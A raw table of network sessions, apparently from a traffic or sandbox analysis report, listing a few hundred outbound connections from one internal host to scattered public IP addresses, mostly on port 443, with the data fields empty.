                                              22185192.168.2.1458906128.30.202.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22186192.168.2.1435418211.32.63.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22187192.168.2.1451630179.174.131.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22188192.168.2.1457242146.115.173.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22189192.168.2.145277042.127.143.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22190192.168.2.1457838144.125.67.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22191192.168.2.1442216133.187.135.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22192192.168.2.1446350131.189.218.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22193192.168.2.144585840.81.52.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22194192.168.2.1453428208.170.216.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22195192.168.2.143561439.128.224.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22196192.168.2.1454542151.135.230.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22197192.168.2.1455740173.13.197.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22198192.168.2.1441932103.80.248.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22199192.168.2.143570266.9.25.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22200192.168.2.1458378216.11.137.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22201192.168.2.1452302147.36.7.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22202192.168.2.1450588160.168.85.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22203192.168.2.144524058.250.166.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22204192.168.2.1449822189.134.250.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22205192.168.2.143678649.3.241.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22206192.168.2.1458064121.127.212.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22207192.168.2.1454774182.93.6.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22208192.168.2.1460114193.231.176.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22209192.168.2.1436232178.175.0.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22210192.168.2.1457288106.113.175.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22211192.168.2.146071649.156.198.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22212192.168.2.143777224.141.132.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22213192.168.2.144056038.147.168.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22214192.168.2.1454090195.67.7.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22215192.168.2.1445168163.165.46.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22216192.168.2.1433924151.223.196.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22217192.168.2.144357617.240.7.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22218192.168.2.145125090.214.166.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22219192.168.2.145078638.151.94.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22220192.168.2.1460152213.237.74.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22221192.168.2.1458450154.81.239.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22222192.168.2.1460248194.58.233.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22223192.168.2.1452760223.169.106.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22224192.168.2.1453982136.227.246.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22225192.168.2.1453268211.186.42.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22226192.168.2.145976077.24.170.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22227192.168.2.145466651.227.239.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22228192.168.2.1439062178.59.242.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22229192.168.2.1436954129.25.141.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22230192.168.2.1452552157.120.59.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22231192.168.2.143717269.159.54.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22232192.168.2.1448362202.241.41.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22233192.168.2.1455450121.118.101.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22234192.168.2.1441336120.113.42.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22235192.168.2.145217290.141.153.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22236192.168.2.1434824211.95.54.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22237192.168.2.1450220148.154.175.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22238192.168.2.143599696.100.204.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22239192.168.2.1433408209.217.109.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22240192.168.2.1439724165.131.15.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22241192.168.2.145553045.35.141.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22242192.168.2.144997663.95.202.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22243192.168.2.144866857.247.151.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22244192.168.2.1442554131.39.167.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22245192.168.2.1454880223.170.159.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22246192.168.2.1450894120.231.199.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22247192.168.2.145210649.32.138.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22248192.168.2.1444248140.238.145.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22249192.168.2.1435650162.52.250.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22250192.168.2.1438842175.244.32.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22251192.168.2.1450000195.250.150.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22252192.168.2.144607620.210.249.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22253192.168.2.145248866.234.152.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22254192.168.2.1435872211.199.28.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22255192.168.2.1449908113.152.106.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22256192.168.2.145481063.175.179.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22257192.168.2.1454676118.25.4.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22258192.168.2.144989460.184.228.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22259192.168.2.1443652178.250.58.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22260192.168.2.1438096202.222.125.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22261192.168.2.1454560221.89.68.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22262192.168.2.1438542133.43.175.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22263192.168.2.1455886194.140.80.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22264192.168.2.144326241.227.148.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22265192.168.2.1447992196.248.77.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22266192.168.2.1436846204.133.74.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22267192.168.2.145154817.140.155.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22268192.168.2.1456554136.101.209.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22269192.168.2.1453134181.239.137.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22270192.168.2.145249844.245.177.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22271192.168.2.1438262154.246.106.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22272192.168.2.1441212167.65.212.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22273192.168.2.143389625.254.60.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22274192.168.2.143730243.229.96.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22275192.168.2.143570439.135.72.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22276192.168.2.1452418128.64.98.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22277192.168.2.143604844.174.142.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22278192.168.2.145745020.66.67.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22279192.168.2.1435706192.214.33.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22280192.168.2.143456412.9.135.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22281192.168.2.1443396116.184.87.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22282192.168.2.145112466.203.179.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22283192.168.2.144219847.246.104.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22284192.168.2.1455402144.155.92.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22285192.168.2.143560053.128.125.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22286192.168.2.145614052.178.156.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22287192.168.2.143892839.19.138.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22288192.168.2.1459292109.52.177.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22289192.168.2.1442794191.112.222.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22290192.168.2.1444980140.250.212.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22291192.168.2.1458730177.106.107.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22292192.168.2.143736859.114.91.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22293192.168.2.1457406192.160.225.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22294192.168.2.1433766207.200.172.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22295192.168.2.144328666.180.67.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22296192.168.2.1454494146.4.1.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22297192.168.2.1447624100.138.177.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22298192.168.2.1454856129.228.205.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22299192.168.2.14580781.132.236.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22300192.168.2.1448654194.187.192.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22301192.168.2.1435208151.232.145.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22302192.168.2.1450680119.22.98.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22303192.168.2.1454554217.132.20.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22304192.168.2.1438642145.26.204.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22305192.168.2.1460158128.108.99.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22306192.168.2.1456426167.223.154.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22307192.168.2.143558854.218.249.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22308192.168.2.146094688.111.197.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22309192.168.2.1434534205.185.78.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22310192.168.2.143706262.29.6.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22311192.168.2.143511643.103.95.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22312192.168.2.143997834.129.8.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22313192.168.2.145774057.134.65.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22314192.168.2.1458734189.154.47.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22315192.168.2.1456532107.228.137.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22316192.168.2.1457934139.113.214.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22317192.168.2.143750032.242.124.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22318192.168.2.1454444109.249.176.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22319192.168.2.144820066.199.173.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22320192.168.2.1444040151.97.28.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22321192.168.2.1453082196.83.165.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22322192.168.2.144842266.99.121.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22323192.168.2.145254684.84.107.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22324192.168.2.143790684.160.89.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22325192.168.2.1435716217.68.140.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22326192.168.2.1432840184.179.50.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22327192.168.2.1454094142.163.3.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22328192.168.2.1453928115.130.225.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22329192.168.2.1435158112.2.8.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22330192.168.2.1435266107.222.144.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22331192.168.2.1446270184.85.105.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22332192.168.2.145563647.197.239.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22333192.168.2.145847614.191.115.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22334192.168.2.1452190121.207.53.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22335192.168.2.143655013.100.42.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22336192.168.2.1442632108.26.98.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22337192.168.2.1450836223.174.214.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22338192.168.2.1448502187.176.84.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22339192.168.2.1458242192.98.35.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22340192.168.2.143532495.92.163.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22341192.168.2.1435616218.97.204.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22342192.168.2.1448880200.160.86.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22343192.168.2.1435636133.109.79.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22344192.168.2.1451120203.146.55.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22345192.168.2.1434596155.96.78.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22346192.168.2.1446656124.156.207.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22347192.168.2.144587273.203.38.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22348192.168.2.1454632180.86.16.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22349192.168.2.143371440.143.171.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22350192.168.2.1448338124.105.157.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22351192.168.2.1440776177.21.156.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22352192.168.2.1449150173.178.10.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22353192.168.2.1441314109.142.75.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22354192.168.2.144981285.31.47.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22355192.168.2.1454620109.204.170.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22356192.168.2.1457726133.143.175.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22357192.168.2.1457250112.70.136.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22358192.168.2.1440488123.45.241.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22359192.168.2.1436086191.45.75.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22360192.168.2.143307085.140.20.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22361192.168.2.145623038.179.228.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22362192.168.2.1456772220.242.208.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22363192.168.2.144682893.152.50.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22364192.168.2.1441812168.141.101.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22365192.168.2.1445040106.74.33.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22366192.168.2.1436878140.52.66.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22367192.168.2.1438458126.42.142.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22368192.168.2.1447766108.167.225.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22369192.168.2.1460076206.244.67.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22370192.168.2.1440148177.237.223.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22371192.168.2.1455658200.30.181.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22372192.168.2.1437740112.140.196.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22373192.168.2.144573863.41.254.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22374192.168.2.1458780173.106.153.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22375192.168.2.1456778169.216.17.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22376192.168.2.1443394119.59.126.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22377192.168.2.145544464.3.209.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22378192.168.2.1437816131.3.100.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22379192.168.2.1451624129.128.227.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22380192.168.2.1446438113.225.98.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22381192.168.2.144075844.211.225.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22382192.168.2.1434884185.166.148.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22383192.168.2.145185235.76.15.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22384192.168.2.145648442.116.8.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22385192.168.2.1450128223.90.96.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22386192.168.2.145272077.167.67.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22387192.168.2.1453188116.17.66.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22388192.168.2.144730858.161.57.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22389192.168.2.143883664.104.186.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22390192.168.2.1460074146.235.122.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22391192.168.2.145342262.108.22.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22392192.168.2.145221853.137.73.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22393192.168.2.1454266220.185.41.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22394192.168.2.1439640173.96.32.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22395192.168.2.145036483.208.204.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22396192.168.2.1440638175.152.147.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22397192.168.2.1442496145.21.29.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22398192.168.2.14480385.182.39.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22399192.168.2.1443082154.223.148.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22400192.168.2.1446694129.17.57.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22401192.168.2.145986261.224.226.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22402192.168.2.1453588144.230.199.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22403192.168.2.1437146146.208.16.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22404192.168.2.144271870.173.67.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22405192.168.2.1446348202.230.56.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22406192.168.2.1450852146.120.49.153443
                                              TimestampBytes transferredDirectionData


